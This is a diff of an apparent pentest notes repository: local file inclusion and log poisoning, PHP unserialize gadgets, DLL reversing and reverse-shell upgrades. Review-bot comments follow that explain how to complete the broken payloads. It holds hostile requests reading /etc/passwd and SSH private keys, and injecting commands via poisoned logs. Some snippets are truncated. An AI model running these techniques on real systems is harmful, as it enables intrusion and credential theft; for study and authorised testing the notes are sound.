diff --git a/enumeration/docs/port_knocking.md b/enumeration/docs/port_knocking.md new file mode 100644 index 0000000..e24cf54 --- /dev/null +++ b/enumeration/docs/port_knocking.md @@ -0,0 +1,13 @@ +# Port Knocking + +* Open filtered port behind a firewall by knocking nicely + +## Usage + +* `knockd` +```sh +knock +``` +or +* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking) +* `nc -z` diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index 3ca217c..611a816 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd ```sh curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ' -H 'User-Agent: Mozilla/5.0 Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1' ``` - * Follow up with a request to - ```HTTP - curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' - ``` + +* Follow up with a request to + +```HTTP +curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' +``` + +### /proc/self/fd +* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2) +* Log poisoning and opening logfile via `/proc/self/fd/xx`. + ### Base64 Encoding via PHP * Circumvent filter via encoding local files included ins a GET parameter value ```http @@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=< * `/root/.ssh/id_rsa` * `/var/log/apache2/access.log` * `C:\boot.ini` +* `/proc/self/fd/xx` ## Tricks * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4 * Terminate query with `/.` * `..//..//..//file`, double slashes + diff --git a/exploit/web/php/unserialize.md b/exploit/web/php/unserialize.md new file mode 100644 index 0000000..9a36eb2 --- /dev/null 
+++ b/exploit/web/php/unserialize.md @@ -0,0 +1,20 @@ +# Unserialize + +* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/) + +* Serialize via +```php +'; +} + +print urlencode(serialize(new FormSubmit)); +?> +``` diff --git a/reverse_engineering/docs/dll_reversing.md b/reverse_engineering/docs/dll_reversing.md new file mode 100644 index 0000000..8899c40 --- /dev/null +++ b/reverse_engineering/docs/dll_reversing.md @@ -0,0 +1,9 @@ +# DLL Reversing + +* Start DLL on its own with the help a wrapper +```C# +HMODULE dll = LoadLibraryA("DLL.DLL"); +typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y) +Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName"); +Add(1, 2); +``` diff --git a/reverse_engineering/docs/function_mangling.md b/reverse_engineering/docs/function_mangling.md new file mode 100644 index 0000000..d44db63 --- /dev/null +++ b/reverse_engineering/docs/function_mangling.md @@ -0,0 +1,4 @@ +# Function Decoration + +* Done to imported functions in order to do interpositioning and identify the variants of the function. +* [name mangling](https://en.wikipedia.org/wiki/Name_mangling) diff --git a/reverse_shells/docs/prep b/reverse_shells/docs/prep deleted file mode 100644 index c7e911e..0000000 Binary files a/reverse_shells/docs/prep and /dev/null differ diff --git a/reverse_shells/docs/shell_upgrade.md b/reverse_shells/docs/shell_upgrade.md index 75222f8..f41aff4 100644 --- a/reverse_shells/docs/shell_upgrade.md +++ b/reverse_shells/docs/shell_upgrade.md @@ -1,5 +1,9 @@ # Upgrade Reverse Shell +* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/) +* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) + ## Via interpreter ### PHP * reverse shell 
@@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")' perl -e 'exec "/bin/sh";' ``` +### Script +```sh +/usr/bin/script -qc /bin/bash /dev/null +``` + ## Next 1. `ctrl` + `z` 2. `stty echo -raw`
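Review bot: in `enumeration/docs/port_knocking.md` the `knock` example under `## Usage` is incomplete: the client needs the target host and the port sequence, e.g. `knock <host> 7000 8000 9000` (append `:udp` to a port for a UDP knock), and the same applies to `nc -z`, which is shown with no host or port (one `nc -z <host> <port>` per knock, in order). The summary bullet should also name the mechanism instead of "knocking nicely": `knockd` on the target watches for a specific sequence of connection attempts and only then inserts the firewall rule that exposes the port. Minor: the bullet lists `knockd`, which is the server daemon, but the command shown is the client `knock`; keep the two apart.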
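Review bot: in the first hunk of `exploit/web/local_file_inclusion.md` the log-poisoning pair of requests does not work as written: the first `curl` sends a plain `User-Agent: Mozilla/5.0 Firefox/70.0`, so nothing executable lands in `access.log`, yet the follow-up request passes `&lfi=ls%20../` as if a PHP payload that reads `$_GET['lfi']` were already in the log. Either the `<?php ... ?>` tag in the User-Agent was lost when the snippet was pasted (angle brackets swallowed) and should be restored, or the poisoning step should be written out explicitly before the follow-up. Both URLs also have an empty host (`http:///lfi/lfi.php` and `-H 'Host: '`); use a visible placeholder such as `http://<target>/lfi/lfi.php`. The follow-up block is fenced as ```HTTP but contains a shell command; tag it `sh` like the first block. Nit in the trailing context: `ins a GET parameter value` should read `in a GET parameter value`.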
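Review bot: in the second hunk of `local_file_inclusion.md` the new `* /proc/self/fd/xx` entry should say what `xx` is: the number of a file descriptor the web server process holds open (the access or error log being the interesting one), which has to be iterated over small integers, and reading through it works even when the log's real path is unknown or not readable by name. The hunk also appends an empty line at end of file after the `..//..//..//file` bullet; drop it so the file ends with a single newline like the rest of the repo.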
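Review bot: in `exploit/web/php/unserialize.md` the PHP block is truncated: it opens with `';` and a stray `}` and then calls `serialize(new FormSubmit)`, but the `<?php` tag, the `class FormSubmit` declaration, its properties and the magic method (for example `__destruct`) whose side effect the gadget relies on are all missing, most likely because everything between `<` and `>` was stripped on paste. Restore the full class from the linked Not So Secure post, and add a sentence on what the urlencoded output is for (handing it to the target's `unserialize()` via the vulnerable parameter), so the file explains the attack rather than only the encoding step. Also `* Serialize via` reads better as `* Build the payload with`.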
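Review bot: in `reverse_engineering/docs/dll_reversing.md` the fence is tagged `C#` but the code is C/C++ (`HMODULE`, `LoadLibraryA`, `GetProcAddress`, a function-pointer `typedef`); tag it `c` or `cpp` and add `#include <windows.h>`. Neither return value is checked, so a wrong path or a wrong mangled name dereferences NULL: test `dll` and `Add` before the call and `FreeLibrary(dll)` afterwards. The typedef also hard-codes `WINAPI` (`__stdcall`) and a `void` return for a function the comment describes as `Add(int x, int y)`; the calling convention and return type must match the export, otherwise the call corrupts the stack or silently discards the result. On MSVC the decorated name encodes both (run it through `undname`), so read them off the export rather than guessing. Finally `with the help a wrapper` should read `with the help of a wrapper`.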
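Review bot: in `reverse_engineering/docs/function_mangling.md` the first bullet describes something other than what the linked Wikipedia page covers: name mangling is the compiler encoding namespace, class and parameter types into a symbol name so that overloaded or namespaced functions get unique linker symbols; it applies to every such symbol, exported or imported, and is not done "to do interpositioning" (interposition is a separate linker/loader technique that works on mangled and unmangled symbols alike). Suggested wording: `Compilers encode namespace, class and parameter types into the symbol name so overloads can coexist; when reversing, demangle (c++filt for GCC/Clang, undname for MSVC) to recover the signature before calling the export.` The heading `# Function Decoration` and the filename `function_mangling.md` also disagree; MSVC says decoration and GCC/Clang say mangling, so mention both terms.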
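Review bot: in the second hunk of `reverse_shells/docs/shell_upgrade.md`, `### Script` is placed under `## Via interpreter`, but `script` is not an interpreter; either rename the parent section (e.g. `## Via PTY allocation`) or present it beside the `python -c 'import pty; ...'` entry as the fallback when Python is absent, which is what the `reverse shell without python` link added in the first hunk suggests. `script -qc /bin/bash /dev/null` is util-linux syntax; on BSD/macOS `script` the order is `script -q /dev/null /bin/bash`, worth a one-line caveat. Drive-by on the trailing context: step 2 of `## Next` reads `stty echo -raw`, which re-enables echo and leaves raw mode off, the inverse of the usual `stty raw -echo` run on the attacker terminal before `fg`.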